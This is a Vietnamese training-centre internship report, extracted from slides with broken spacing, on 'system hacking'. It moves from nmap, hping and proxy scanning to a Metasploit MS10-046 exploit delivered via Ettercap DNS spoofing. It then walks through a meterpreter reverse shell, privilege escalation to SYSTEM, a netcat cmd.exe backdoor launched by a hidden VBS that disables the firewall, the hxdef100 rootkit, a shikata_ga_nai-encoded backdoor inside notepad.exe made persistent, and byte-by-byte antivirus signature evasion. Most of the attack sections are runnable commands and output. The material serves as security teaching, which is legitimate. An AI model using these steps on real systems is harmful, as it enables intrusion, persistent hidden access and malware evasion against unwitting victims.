Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
 

Bao cao thuc tap athena tuan 1 2-3

  • 1. Đề Tài Thực Tập SYSTEM HACKING Người Hướng Dẫn: Thầy Võ Đỗ Thắng Người Thực Hiện Đề Tài: PHẠM HOÀNG HẢI
  • 2. MỤC LỤC I – Giới Thiệu 1.0 Giới thiệu về ATHENA……………………………3 1.1 Giới thiệu về System Hacking………………..........7 II – Nội Dung Thực Tập Tại ATHENA 2.0 Hướng dẫn cài VMware và BackTrack 5r3………...8 2.1 SCANNING……………………………………….25 2.2SYSTEM HACKING……………………………...64 2.3TROJAN…………………………………………...89
  • 3. GIỚI THIỆU 1.0 – Giới Thiệu Về ATHENA Lịch sử: Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà . Lĩnh Vực Hoạt Hộng Chính: + Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính,….. + Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,.....
  • 4. + Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,...... Đội Ngũ Giảng Viên: +Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA +Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâmATHENA
  • 5.
  • 6. 1.1 – Giới Thiệu Về System Hacking Hiện nay, rất nhiều người sử dụng máy tính hệ điều hành Windows như WIN XP, WIN 7 và các ứng dụng văn phòng như Microsoft Office 2003,2007,… cho công việc hang ngày. Tuy nhiên những hệ điều hành trên và các ứng dụng Microsoft Office đó sẽ có những lỗ hổng bảo mật. Và các hacker sẽ lợi dụng điều đó để xâm nhập trái phép vào máy nạn nhân để đánh cắp thông tin cũng như phá hoại. Đề tài System Hacking này sẽ giúp các bạn hiểu được cách hacker xâm nhập và khai thác các lỗ hổng trên như thế nào. Và làm sao có thể khắc phục được các lỗ hổng và bảo vệ được máy của mình nếu như có xâm nhập trái phép xảy ra.
  • 7. NỘI DUNG THỰC TẬP 2.0 – Hướng dẫn cài VMware và BackTrack 5r3 Cài VMware: Bước 1: Các bạn download phần mềm VMware worksations trên mạng về và cài đặt như bình thường. Bước 2: Thiết lập CẤU HÌNH MÁY ẢO cho phần mềm: Chọn Create a new virtual Machine:
  • 8. Chọn Next, rồi chọn i will install the operating system later Chọn Next, chọn HDH mà bạn muốn cài, ở đây mình chọn WINXP
  • 9. Chọn Next > chọn Browse để lưu file ( chọn ổ nào trống tầm 10G là đẹp ko nhất thiết là ổ đĩa C )
  • 10. Nhấn Next chọn dung lượng ổ cứng (cái này tùy mọi người chọn nhé )
  • 11.
  • 12. Chọn Next > chọn custumize hardware, mục này nhiều cái hay lắm Xong rùi chọn Close rồi chọn Finish là xong!
  • 13. Bước 3: CÀI HỆ ĐIỀU HÀNH CHO MÁY ẢO Cài trực tiếp từ đĩa winxp.iso,vào menu VM chọn settings chọn CD/DVD chọn đường dẫn là đĩa winxp.iso cần cài:
  • 14. Chọn OK rùi chọn nút màu xanh như hình dưới chọn power on để cài Win.
  • 15. Quá trình cài windows y chang cài trên máy thật thế là xong
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24. Nhập vào đoạn text sau để chuyển sang giao diện đồ họa [startx] Click chọn install trên desktop để tiếp tục cài đặt các thông số như ngày giờ, ổ đĩa và ngôn ngữ > Xong. Nếu muốn sử dụng lệnh thì có thể mở Terminal.Hình màu đen ở thanh trên cùng nhỏ nhỏ
  • 25. SCANNING Bài1: Nmap Scanning 1. Mục Đích: - PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể installtrênWindow vàLinux. - Mụcđíchbàilab: sử dụngNmapđểxácđịnhcácthôngsố hệ điềuhành, port, dịchvụ tươngứngvới… - Nmaplà mộttrongnhững networkscannerrất hiệuquả.Thông quanmapta có thểthực hiện quátrìnhscanvới cáckỹ thuậtkhácnhaunhư SYN scan,TCP Connectionscan,Xmas scan,Null scan… 2. Cácbướcthựchiện - Ta có thểsử dụngnmaphỗ giao diệnđồ họavàgiao diệndònglệnh. Giao diện dòngđồ họasửdụng chươngtrìnhzendmap.Cònở giao diệndònglệnhthìta sử dụng câulệnh nmap.
  • 26. - Bước1:taxemgiúp đỡ của câulệnh NMAP - Bước2:thựchiện quátrìnhpingsweep cho đường mạng192.168.1.0/24để xácđịnhcác hostđang có trongđường mạng bằngcâulệnh“nmap -sP-v 172.16.34.1/24”
  • 27. - Bước3:Ta cần xácđịnhxemở IP172.16.34.18đang có nhưngport nào đang mở.Đểlàmviệcnày ta có thể sử dụngcácdạngscankhácnhau. Vídụở đây tasử dụngkỹthuậtSYN scanvới câulệnh “nmap –sS172.16.34.18”
  • 28.
  • 29. - Bước4:xácđịnhgiátrị porttrongquátrìnhscan. Mặcđịnhchươngtrìnhsẽ scantất cảcác port. Ví dụtacần xácđịnh trongđườngmạng172.16.34.1/24 thìđang có bao nhiêumáyđangmở port445,139,80,3389tacó thểsử dụng câulệnh “nmap- sT -p 445,139,3389172.16.34.1/24”
  • 30. - Bước5:Sử dụngnmapscanđường mạngvới IPPublic bên ngoài với câulệnh “nmap -sS-p 80222.253.166.1/24> /root/Desktop/scan_adsl.txt” . Như vậy kết quảscansẽđượcghi thànhfile scan_adsl.txt
  • 31. - Bước6:Sử dụngnmapđểxácđịnhcác thôngsố của cácứng dụngđượctriển khai trênserver. Ta sử dụng“nmap-p 1-65535-T4-A -v192.168.0.4”
  • 32.
  • 33. - Bước7:Trong nmaphỗ trợ sử dụng các scriptsđểnscanmột lỗi ứng dụng nào đó. Đầutiênta có thểsử dụng câu lệnh “locatenmap” đểxácđịnhcácfilescript đangđượchỗ trợ trong nmap. Ví dụ ta cóthểsử dụngkiểm tralỗi ms08-067của cácmáytrongđườngmạng“nmap -sT --script smb-check-vulns.nse -p 139,445 172.16.34.1/24” Ngoài ra ta có thể kiểmtraxemtrongmạng có máy nào đangchuyểncard mạng sangPromicious modeđểsniffertraffictrênđườngtruyền“nmap --script sniffer- detect172.16.34.1/24”
  • 34. - Bước8:Trong quátrìnhscanta nênthayđổi cácgiátrị IPsource,lưulượnggói tingửi trongthời gian1giây, thực hiện phânmảnh gói tin,giảthôngsố ttl. Vídụ
  • 35. tathựchiện câulệnh “nmap -sS-p 3389,445,139,23,22,80--max-rate 50-S 10.0.0.1192.168.1.78 -ttl 128-f-e eth0-Pn” -sS :SYN Scan -p:port --max-rate:luuluong maximumpersecond -f:fragment -S:Spoofing IPaddress -e:xac dinhinterface -ttl:xac dinh giatri ttl (macdinh window la 128)
  • 36.
  • 37. Bài 2:ScanningNmapThôngQuaProxyChains 1. Mục đích bài lab - Sơđồ bàilabnhư sau: 192.168.1.0/24
  • 38. - PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể installtrênWindow vàLinux. - Mụcđíchbàilab: tacấuhình côngcụproxychainlàmlocal proxy chươngtrình nmap. Proxy chainsẽkết nốiđếnmột Proxy Server ngoài mạnginternet. Như vậythì nmapsẽscan victimserverthông quamột proxy server. 2. Cácbướcthựchiện - Bước1:Install và Configure Proxychains.Nếunhư máylinux ta chưacó install
  • 39. Proxychains,tathựcthi câulệnhbên dưới nhanld@nhanld-laptop:~$sudo su [sudo]password for nhanld: root@nhanld-laptop:/home/nhanld# apt-get installproxychains Vịtrí file cấuhình cho proxychainstại /etc/proxychains.conf nhanld@nhanld-laptop:~$gedit /etc/proxychains.conf Tasẽbỏ dấu# trướcdòngstrict_chaintrongfile cấuhình. Tìmkiếmmộtsố trangwebcungcấp proxyserver.Proxychains hỗ trợ cácphương thứclà HTTPProxy,SOCK 4vàSOCK 5.Tacó thểdùngcáctừ khóađểtìmkiếm trênGoogle“freeproxy server list” hoặc“freeproxy server listsock” - CấuhìnhProxyChains hỗ trợ cácdạng Proxy. Vídụ,tasẽthêm mộtsố dòngvào file/etc/proxychains.conf http94.23.236.21780 http 83.216.184.132 8080 sock5203.206.173.41080
  • 40. sock485.119.217.1131080 sock4201.55.119.431080 - Bước2:Install Nmaptừ Source. Tacó thểdownloadsourceNmaptừ trangwebhttp://nmap.org/download.html. Thựchiệnquátrìnhinstall từ source,ta chọninstall vào đường dẫnlà/opt/nmap nhanld@nhanld-laptop:~$cd/home/nhanld/Download nhanld@nhanld-laptop:~$tar xvfnmap-5.51.tar.bz2 nhanld@nhanld-laptop:~$cdnmap-5.51 nhanld@nhanld-laptop:~$mkdir /opt/nmap nhanld@nhanld-laptop:~/Downloads/nmap-5.51$./configure–
  • 41. prefix=/opt/nmap nhanld@nhanld-laptop:~/Downloads/nmap-5.51$make nhanld@nhanld-laptop:~/Downloads/nmap-5.51$sudo makeinstall - Bước3:dùng Nmapscanthông quaProxychains. Đểthựchiện câulệnhscan bằngtool nmapthông qua proxychains,ta nhậpvào câulệnh proxychains và tiếptheolà câulệnhcủaNmap root@nhanld-laptop:/home/nhanld/Downloads/nmap-5.51#proxychains nmap -sS 27.0.12.130 ProxyChains-3.1(http://proxychains.sf.net) StartingNmap 5.51( http://nmap.org) at 2011-06-1416:27ICT Warning:File ./nmap-services exists, but Nmap is using /opt/nmap/share/nmap/nmap-services for securityand consistency reasons.set NMAPDIR=.togive priorityto files in your local directory (may affect the other data filestoo). Nmap scan report for mail.kaka.vn (27.0.12.130) Host is up (0.11s latency). Not shown:991closed ports PORT STATE SERVICE 21/tcp openftp 42/tcp filtered nameserver
  • 42. 80/tcp openhttp 111/tcpopen rpcbind 135/tcpfiltered msrpc 139/tcpfiltered netbios-ssn 445/tcpfiltered microsoft-ds 3306/tcp open mysql 8888/tcp open sun-answerbook
  • 43. Bài 3: Nessus Scanning 1. Mục đích bài lab - Nessus Clientvà Serverta có thể sử dụngtrêncùng1 PC hoặctrên2PC. Máy victimtrongbài Labsử dụnglà máy Window
  • 44. - Nessuslà mộttrong những côngcụhỗ trợ adminscan các vulnerable của hệ điềuhành, cácứngdụng… khátốt. Ngoài ra ta có thểsửdụngcáccôngcụ khácnhư OpenVAS,GFILanguard 2. Cácbướcthựchiện - Bước1:Đầutiên tasẽdownloadvàđăngkýActivation Codetại trangweb http://www.tenable.com/products/nessus. Cácthao táccấuhìnhcủa Nessussẽđượcthựchiệntrên nềngiao diệnweb. - Bước2:Saukhicàiđặtxong,tasử dụngtrìnhduyệtwebkếtnối vào https://localhost:8834đểđiềukhiểnNessus
  • 45.
  • 46. - Bước3:Tiếptụcđịnh nghĩara usernamevà password - Bước4:Nhậpvào ActivationCode
  • 47. - Bước5:Sauđó chươngtrinhsẽ downloadvềcác Pluginđểsử dụngscan
  • 48. Bước6:Cấu hìnhNessusscanvulnerable của hệđiềuhànhvàứng dụng. Cácbước chínhtacần cấu hình: oTạo Policyvà chọnphươngthứcscan. oChọnđốitượngscan oKiểmtrakết quảvà xuấtreport ĐầutiêntaloginvàoNessusbằng cáchsử dụngđườnglink https://localhost:8834
  • 49. Clickvào Policies, clickvào Add,địnhnghĩara một profilescan.Ở đâytađịnh nghĩara profile có tênlàAthenaScan.
  • 50.
  • 51. Nhậpvào usernamevà passwordxácthựcđểscan(ta có thểscanđượcnhiềulỗi hơn)hoặctakhôngnhậpusernamevàpassword.
  • 52.
  • 53. ChọnWindows:Microsoft Bullentinsđể scancác lỗi củahệđiềuhành Window. Thôngtindatabasetađểmặcđịnh.
  • 54.
  • 55. - Bước7:Tiếptụcta Clickvào SCANS,xácđịnhPolicylà AthenaScan,Scan Target nhậpvào IP 192.168.1.236đểcấu hìnhcácđốitượng đểscan. - Bước8:Cuối cùngta xemkết quảscanvàxuấtreport
  • 56.
  • 57.
  • 58. Bài:Hpingscanning 1. Mục đích bài lab - Sơđồ bàilabnhư sau: - PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đãđượcinstall mặc địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể installtrênWindow vàLinux. - Mụcđíchbàilab: sử dụngHpingđểxácđịnhcácthôngsố hệ điềuhành, port, dịchvụ tươngứngvới. Ngoài ra Hpingcho phépta tạo ra nhữnggói tintheoý mìnhvà dễdàngđiều chỉnh lưulượng 2. Cácbướcthựchiện - Bước1:Hpinglà mộttrongnhững công cụ scantốt.Nó cho phéptatạo ra các gói tintheoý muốn, điềuchỉnhsố lượnggói tingửi… Mặcđịnhhping2,hping3đượccàiđặt mặcđịnhtrongBack Track5. Tacó thểxemgiúpđỡ bằng câulệnh “hping3--help”
  • 59. - Bước2:Sử dụnghpingđểgửistandardICMPpacketđến target. Bằng câulệnh “hping3–icmp –c 4athena.edu.vn”
  • 60. - Bước3:Tiếptheotasử dụnglại câulệnhở trênvà thêmvào 2 biến o–dkíchthướcdatatronggói tin o–Vhiển thịthôngtin đầyđủ - Bước4:Sử dụng biến –jđểxemkếtquảoutput dạng hexa decimal
  • 61. - Bước5:Sử dụnghping3gửiSYN packetđếnmột host. Tasẽthêmbiến–S và– pđểxácđịnhgiátrịport25. Trênmàn hìnhtasẽnhậnđược4 packetvới“SA” flag. Với giátrị SYN/ACK trảvềnghĩalà port này Open. Câulệnh ta phải nhập vào là“hping3 – S–p 25–c 4 athena.edu.vn” - Bước6:Attacker gửi ACK Probevới giátrịsequence numberrandom. Nếunhư khôngcó packet response nghĩa là portđược filter (có stateful firewall).Nếu RSTpacket reponsenghĩa là port khôngcó được filter (khôngcó firewall)Ta có thểxácđịnhthêm giátrịsourceport cho câulệnh AckScanở trênbằng biến –s. Ví dụtasẽnhậpvào câulệnh “hping3–A –p 25-s 5555–c4athena.edu.vn”
  • 62. - Bước7:Ta có thểspoofing IPbằngbiến–a.Ví dụ tanhậpvào câulệnh như sau “hping3-S-p 80-s 5555-a 192.168.1.121-c 10192.168.1.254” Nếunhư tasửdụngwireshark capturetrafficthì sẽthấytrafficgiữa2IP 192.168.1.121và IP192.168.1.254
  • 63. - Bước8:Đểscan cùng1lúc nhiều portthì tasẽsử dụngoption--scan[port cần scan]. Ví dụ“hping3 –S–scan 80,443,25,85-90–Vathena.edu.vn”
  • 64. 2.2 System Hacking I. Mụ c tiêu bài lab -Mô hìnhbàilab - Mụcđíchbàilab: tasẽthử thựchiện tấn côngvào 1máyWindow XP (victim), sauđó thựchiệnuploadNetcatBackdoorđểđiềukhiểnvictim, tiếptục tasử dụngcông cụ Rootkitđểẩnđi process củanetcat - Máyattacker sử dụng chươngtrìnhMetasploit đãđượccàiđặtsẵn.
  • 65. II.Các bước thực hiện 1. Chuẩn bịMetasploit - Tasử dụnglỗi shortcutMs10-046đểkhaitháclỗi,tasẽthực hiệnnhư sau: root@bt:/pentest/exploits/framework3#msfconsole msf >search lnk msf>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf>set payload windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader)>set LHOST192.168.1.10 LHOST =>192.168.1.10 msf exploit(ms10_046_shortcut_icon_dllloader)>set SRVHOST192.168.1.10 msf exploit(ms10_046_shortcut_icon_dllloader)>exploit -j [*]Exploit runningas backgroundjob.
  • 66. [*]Startedreverse handler on192.168.1.10:4444 [*] [*]Sendvulnerable clientsto 192.168.1.10EPzSUxdEj. [*] Or,get clientsto saveandrendertheiconof http://<your host>/<anything>.lnk [*] [*]UsingURL:http://192.168.1.10:80/
  • 67. [*]Server started. - Bâygiờ làmsao đểclient connectvào server192.168.1.0. Tacó thểchọn giải pháplà sử dụngDNS spoofing 2. Cấuhình EttercapDNS Spoofing - Ta cấuhìnhfileetter.dns (/usr/share/ettercap/etter.dns)với IP củatrang www.google.comlà IPcủaattacker 192.168.1.10bằng cáchthêmvào 2dòng sau www.google.comA192.168.1.10 www.google.comPTR192.168.1.10 - Thựchiệnquátrình dns spoofing Ettercap-T -q –Marp:remote–P dns_spoof –i eth0/192.168.1.11/// - Tại máy client nhậpvào trangweb www.google.comvà hiệnra mànhình giống nhưbên dưới
  • 68. 3. Kiểmtra metasploit - Metasploit trả ra chotacác dònglog nhưbêndưới msf exploit(ms10_046_shortcut_icon_dllloader)>[*]Sending UNCredirectto 192.168.1.11:1655... [*]SendingUNCredirectto 192.168.1.11:1655... [*]Respondingto WebDAV OPTIONS requestfrom192.168.1.11:1660 [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj
  • 69. [*]Sending301for /EPzSUxdEj... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/ [*]Sendingdirectory multistatus for /EPzSUxdEj/... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj [*]Sending301for /EPzSUxdEj... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/
  • 70. [*]Sendingdirectory multistatus for /EPzSUxdEj/... [*]ReceivedWebDAVPROPFINDrequest from192.168.1.11:1660/EPzSUxdEj [*]Sending301for /EPzSUxdEj... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/ [*]Sendingdirectory multistatus for /EPzSUxdEj/... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1661/EPzSUxdEj [*]Sending301for /EPzSUxdEj... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1661/EPzSUxdEj/ [*]Sendingdirectory multistatus for /EPzSUxdEj/... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663/EPzSUxdEj [*]Sending301for /EPzSUxdEj... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663/EPzSUxdEj/ [*]Sendingdirectory multistatus for /EPzSUxdEj/... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663 /EPzSUxdEj/desktop.ini [*]Sending404for /EPzSUxdEj/desktop.ini ... [*]SendingLNK fileto 192.168.1.11:1663 ... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663 /EPzSUxdEj/vncuNN.dll.manifest [*]Sending404for /EPzSUxdEj/vncuNN.dll.manifest... [*]SendingDLLpayload192.168.1.11:1663... [*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663
  • 71. /EPzSUxdEj/vncuNN.dll.123.Manifest [*]Sending404for /EPzSUxdEj/vncuNN.dll.123.Manifest ... [*]Sendingstage(752128bytes)to 192.168.1.11 [*]Meterpreter session 1opened (192.168.1.10:4444->192.168.1.11:1664)at 2011-07-2010:22:16 +0700 msf exploit(ms10_046_shortcut_icon_dllloader)>sessions-l
  • 72. Active sessions =============== IdType Information Connection ------ ----------- ---------- 1 meterpreter x86/win32NHANLD-XPnhanld@ NHANLD-XP 192.168.1.10:4444-> 192.168.1.11:1664 msf exploit(ms10_046_shortcut_icon_dllloader)>sessions-i 1 [*]Startinginteractionwith1... - Kiểmtra mộtsố thôngtincủamáyvictimvà nângquyền meterpreter >getuid Server username:NHANLD-XPnhanld meterpreter>getprivs ===================================================== ======= EnabledProcess Privileges ===================================================== ======= SeDebugPrivilege
  • 74. SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter>getsystem ...gotsystem(via technique 1).meterpreter>getuid Server username:NTAUTHORITYSYSTEM 4. Sử DụngNetcatlàmbackdoor vàhxdef100rootkit - Ta chuẩn bi sẵnfilenc.exeđểupload. FilenàytrongBT5nằmtại vịtrí /pentest/windows-binaries/tools meterpreter>pwd C:DOCUME~1nhanldLOCALS~1Te
  • 75. mp meterpreter >cd C:WINDOWSHelp meterpreter >mkdirnetcat Creating directory: netcat meterpreter >cd netcat meterpreter >pwd C:WINDOWSHelpnetcat meterpreter>upload/pente st/windows- binaries/tools/nc.exe [*]uploading: /pentest/windows- binaries/tools/nc.exe ->. [*]uploaded :/pentest/windows-binaries/tools/nc.exe ->.nc.exe - Tasẽtạo ra mộtfile nc_scripts.bat có nộidungđơngiảnnhư sau @echo off netshfirewall setopmodedisable nc.exe-l -v -p4444-e cmd.exe - Tạo ra mộtfile nc_scripts.vbs có nội dungnhư sau
  • 76. SetWshShell=CreateObject("WScript.Shell") WshShell.Runchr(34) &"C:WINDOWSHelpnetcatnc_scripts.bat"&Chr(34), 0 SetWshShell=Nothing - Upload2file nàyvào máyvictim meterpreter>upload/root/Desktop/nc_scripts.bat . [*]uploading: /root/Desktop/nc_scripts.bat->. [*]uploaded :/root/Desktop/nc_scripts.bat ->.nc_scripts.bat meterpreter >upload/root/Desktop/nc_scripts.vbs . [*]uploading: /root/Desktop/nc_scripts.vbs->. [*]uploaded :/root/Desktop/nc_scripts.vbs->.nc_scripts.vbs - Tasẽsử dụng metasploit upload2file nàyfolder vào C:WINDOWSHelp - Tiếptục tasẽupload rootkit hxdef100:bao gồmmộtfilecấuhìnhvà mộtfile thựcthi
  • 77. +file cấuhìnhđểẩn process của chươngtrìnhnc.exevàfilethựcthi của chươngtrình meterpreter>upload/root/Desktop/hxdef100.ini . [*]uploading: /root/Desktop/hxdef100.ini->. [*]uploaded :/root/Desktop/hxdef100.ini->.hxdef100.ini meterpreter >upload/root/Desktop/hxdef100.exe . [*]uploading: /root/Desktop/hxdef100.exe->. [*]uploaded :/root/Desktop/hxdef100.exe->.hxdef100.exe - Start netcatbackdoor thông quanc_scripts.vbs(start2chươngtrìnhlà nc.exe và cmd.exe)và rootkit meterpreter >shell Process 2868created. Channel28 created. MicrosoftWindows XP[Version5.1.2600] (C) Copyright1985-2001Microsoft Corp. C:WINDOWSHelpnetcat>start nc_scripts.vbs start nc_scripts.vbs
  • 78. - Kiểmtra portvà cáctiếntrìnhđang hoạtđộngtrongmáybằnglệnhnetstat– ano vàtasklist thì tathấy portvà dịchvụ bấtthường
  • 79.
  • 80. - Khởi độngrootkitđểẩnprocess nc.exevà ẩnđifilethựcthi củachươngtrình netcat C:WINDOWSHelpnetcat>start hxdef100.exe start hxdef100.exe - Takiểmtralại process thì thấytiến trìnhnc.exeđã đượcẩnđi.
  • 81. - Attacker sử dụng chươngtrìnhtelnethoặcchươngtrìnhnetcat đểconnect điềukhiểnmáyattacker root@bt:/opt/framework3/msf3#telnet192.168.1.114444 Trying192.168.1.11... Connected to 192.168.1.11. Escape character is '^]'.
  • 82. MicrosoftWindows XP[Version5.1.2600] (C) Copyright1985-2001Microsoft Corp. C:WINDOWSHelpnetcat >C:WINDOWSHelpnetca t>
  • 83. 5. Tạo ra backdoor vàuploadbằng metasploit - Ta chuẩn bị mộtfileđểghépbackdoor vào. Vídụtasử dụng chươngtrình notepad.exe - Sử dụng câulệnhsauđểtạo ra backdoor root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10LPORT=4455R | ./msfencode -e x86/shikata_ga_nai -c 3-t exe -x /root/Desktop/NOTEPAD.EXE- o /root/Desktop/backdoor_notepad.exe [*]x86/shikata_ga_nai succeeded withsize317 (iteration=1) [*]x86/shikata_ga_nai succeeded withsize344 (iteration=2) [*]x86/shikata_ga_nai succeeded withsize371 (iteration=3) - Trong metepreter tacó thểsử dụngcâulệnhrun schedulemeđểupload
  • 84. backdoor và cho backdoor startupvới hệthống. meterpreter>run scheduleme –h Đểhiểnthị cácgiúp đỡ của câulệnh meterpreter>run scheduleme -e /root/Desktop/backdoor_notepad.exe-s [*]Uploading/root/Desktop/backdoor_notepad.exe.... [*]/root/Desktop/backdoor_notepad.exeuploaded!
  • 85. [*]SchedulingcommandC:DOCUME~1nhanldLOCALS~1Tempsvhost72.exe to runstartup..... [*]Thescheduledtask has been successfully created [*]For cleanuprunschtasks /delete/tn syscheck15 /F - Lúcnàybackdoor notepadđãđượckíchhoạt,tatiếptụcsử dụngtính năng multi/handlerđểchờ đợi kết nối củavictim msf exploit(ms10_046_shortcut_icon_dllloader)>use exploit/multi/handler msf exploit(handler) >set payload windows/meterpreter/reverse_tcp payload=>windows/meterpreter/reverse_tcp msf exploit(handler)>set LHOST192.168.1.10 msf exploit(handler)>set LPORT4455 LPORT=>4455 msf exploit(handler)>exploit-j [*]Exploit runningas backgroundjob. - Restartlại máyvictim,lúc nàykếtnối màtađãsử dụngthông qualỗi ms10-046
  • 86. đã bị mất. Sauđó victimtự độngtạo rareverser connectionđếnmáyvictim.msf exploit(handler)> [*]Sendingstage(752128bytes)to 192.168.1.11 [*]Meterpreter session3opened (192.168.1.10:4455 ->192.168.1.11:1025)at 2011-07-2012:08:20 +0700 - Nếunhư takiểmtradịchvụ và các kếtnối của máyclientthìtasẽthấyđiềubất thườngở đâylà mộtdịchvụlạ xuất hiện
  • 87.
  • 89. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân 2.3 VIRUS TROJAN Bài:By PassAnti Virus I. Mục đích bài lab - Hầuhết cácchươngtrìnhchốngvirus đều nhậndạngfilelà chươngtrình độchạidựatrênsignature databaseđượcupdatethườngxuyên - Cáccông cụcầnthiết cho bài lab. Các công cụ nàytacàiđặttrong1máy tính oDsplit:đượcsử dụngđểcắt cácfilethànhnhiềuphầnvớiđộ dàităng dần. oHex Editor:để sử dụng phân tích chươngtrìnhvàthayđổi các giátrị trongfile oChươngtrìnhscanvirus đểkiểmtra. Trongbài labnàytasẽsử dụng chươngtrìnhAvast o1FileđượccácchươngAVcảnhbáo. Trong bài labtasẽsử dụng chươngtrình“IceGoldFreezer” oCáccông cụscan virus onlineví dụnhư trangweb www.virustotal.com II. Cácbướcthựchiện - Tathử scanfile“Ice GoldFreezer” bằngtrangweb www.virustotal.comthì 24/43chươngtrìnhnhậndạng đâylàMalware
  • 90. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân - Copysource“IceGoldFreezer” vào folder chứasourcechươngtrìnhDsplit tathựchiện quátrìnhcắtfilethành cácđoạnvà sử dụngAvastscancác file này. Thông quaquátrìnhnàytasẽướclượngđượcsignature nhậnvirus sẽ nằmở phần nào trongfile.
  • 91. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân - Tasử dụngAvastscantất cảcác fileđãđượccắtra vàxácđịnh file nào bắt đầutừ bytenào thì filebị nhận là Virus
  • 92. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân - Theo kết quảmàn hìnhở trênthì từ byte thứ 102000thì chươngtrình đượcnhận là virus. Taxóahết cácfileđã đượccắt nhỏ. - Tiếptục tasẽkiểmtraxemtừ byte 101000đến 102000thì như thế nào ? Tasử dụngkhoảngtănglà100 byte. - Tascancác filevừa đượctạo ra bằngAvastmộtlầnnữa
  • 93. - Kết quảthuđượclà từ file 101900đến 102000được nhận là virus. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
  • 94. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân - Tatiếptục kiểmtra phânđoạntừ 101800 đến 101900với khoảngtănglà 10byte và scan lại.
  • 95. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân - Kết quảthuđượclà từ file 101820sẽ được nhận là virus. - Tasẽtiếptục phântíchtừ file 101810 đến101820 với khoảngtănglà 1 byte như thế nào ?
  • 96. - Đếnđâythìtađãxácđịnhđượcbyte101819đượcxácđịnhlà có virus TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
  • 98. - Tasẽthayđổi giátrị101819thành mộtgiátrịkhác. Ở đâytasẽđánhthêm vào 2lần phímspacebar.Ta sẽ thấyxuất hiện thêm 2giá trị hexa là2020 trên màn hình. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
